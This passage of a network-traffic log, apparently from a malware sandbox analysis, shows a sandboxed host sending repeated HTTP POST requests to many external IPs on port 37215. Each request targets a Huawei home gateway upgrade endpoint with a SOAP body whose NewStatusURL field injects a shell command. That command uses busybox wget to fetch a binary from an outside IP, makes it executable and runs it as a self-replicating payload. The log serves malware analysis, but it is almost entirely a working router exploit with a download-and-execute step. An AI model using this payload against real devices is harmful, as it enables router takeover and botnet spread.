6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  502192.168.2.1343066157.158.133.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118415117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  503192.168.2.135276441.95.253.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118427038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  504192.168.2.1359554157.24.136.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118460894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  505192.168.2.1348808219.81.127.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118463039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  506192.168.2.135630241.0.127.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118463039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  507192.168.2.133547241.145.67.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118489027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  508192.168.2.1343658197.117.100.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118496895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  509192.168.2.1342424122.226.83.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118504047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  510192.168.2.1359314197.178.241.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118514061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  511192.168.2.1350864197.223.63.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118530035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  512192.168.2.1345908157.198.80.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118535995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
